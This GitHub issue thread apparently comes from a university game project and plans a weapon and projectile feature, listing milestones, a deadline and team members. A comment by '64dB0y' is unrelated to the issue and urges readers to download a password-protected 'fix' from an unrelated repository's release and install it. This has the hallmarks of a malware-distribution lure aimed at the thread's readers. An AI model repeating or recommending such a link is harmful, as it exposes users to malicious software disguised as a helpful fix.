### ISSUE TITLE
Weapon and Projectiles 2

### ISSUE THREAD

**Issue by Magnius001** [UQcsse3200/2024-studio-1#118]
# **Description**
This feature will extend the existing weapon system by implementing projectile functionality, introducing new weapon types, and enhancing weapon rendering. The goal is to create a more dynamic and varied combat experience, allowing for different styles of gameplay based on the types of weapons and projectiles used.

# **Dependencies**
TBD

# **Milestones**
- [x] #135
- [x] #131
- [x] #132
- [x] #133
- [x] #134
- [x] #109 
- [x] #232 
- [x] #256 
- [x] #250 
- [x] #251
- [x] #287 
- [x] #304
- [x] #331

**Completion Deadline:** Sep. 25

# **Extras (optional)**
- [ ] Pickup and drop weapon animation

# **Documentation**
- [Weapon Overview](https://github.com/UQcsse3200/2024-studio-1/wiki/Weapons)

# **Members**
- Rohan Kumar (rohankumar17)
- Trong Hieu Mai (Magnius001)
- Cao Quoc Thang Hoang (thanghoang7020202)
- Divyansh Agarwal (divyanshddn146)
- Benjamin Rose (brose7561)

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Magnius001** [comment]
Reopen feature ticket for sprint 3
